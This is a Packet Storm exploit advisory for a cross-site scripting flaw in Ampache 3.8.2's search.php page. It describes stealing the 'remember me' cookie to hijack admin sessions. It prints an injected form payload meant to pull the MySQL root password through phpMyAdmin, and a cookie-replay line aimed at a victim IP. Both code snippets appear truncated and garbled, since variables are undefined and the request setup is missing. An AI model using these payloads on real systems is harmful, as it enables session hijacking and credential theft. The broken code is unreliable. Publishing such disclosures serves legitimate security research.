seeing is believing

Ampache 3.8.2 Cross Site Scripting

Ampache 3.8.2 Cross Site Scripting
Posted May 29, 2017
Authored by hyp3rlinx | Site

Ampache version 3.8.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | b6b93c3f9643a0cf897ff98afca7bb99

Ampache 3.8.2 Cross Site Scripting

Change Mirror Download
[+] Credits: John Page aka hyp3rlinx  
[+] Website:
[+] Source:
[+] ISR: ApparitionSec


ampache v3.8.2

A web based audio/video streaming application and file manager allowing you to access your music & videos from anywhere,
using almost any internet enabled device.

Vulnerability Type:
Cross Site Scripting (XSS)

Security Issue:
ampache has XSS entry point on "search.php" webpage, if the "remember me" checkbox is used when authenicating, remote attackers
can steal the "ampache_remember" cookie to potentially gain access to the ampache application from another machine/browser.

If application is hosted in an environment using name-based virtual hosting where many different hosts can share the SAME IP address.
Then possibly attackers on same virtual environment can add the session exploit file to the web server and later request it via IP address
potentially allowing attackers to be authenticated using the victims stolen "remember me" credentials.

1 Open a new browser etc
2 Enter victims IP followed by our exploit HTML file including the victims stolen cookie and remember me token.
Your in!


document.cookie="ampache_remember=admin%3Afec492d2160d171ca6e73178d7642e5e%3A9607fc374991cd336dad41b69cddef612981cbdf823a5fa0e8778187e594a7bc; ampache=clrcnors56jpt5h5r8krfp9ag1; ampache_user=admin; player-61646d696e=1";'http://VICTIM-IP/ampache-3.8.2_all/?ampache=clrcnors56jpt5h5r8krfp9ag1')

Below XSS exploit will instead attempt to lift MySQL Database 'root' user password if PHPMyAdmin is present.

Steal MySQL Database 'root' user password POC, if PHPMyAdmin is present.
We will use backtick "`" operator for the Ajax GET request as single quotes are escaped by slashes.

Tested successful in Firefox / PHPMyAdmin 4.5.1

<form method="POST" action="">
<select name="rule_1">
<option value="/></script><script>var xhr=new XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){var`username=root`);if(n!=-1){alert(xhr.responseText.substring(n+104,n+275));}}};`GET`,``,true);xhr.send(null)</script>">Anywhere</option>

Network Access:


Disclosure Timeline:
Vendor Notification: No reply
May 29, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).



RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2016 Packet Storm. All rights reserved.

Security Services
Hosting By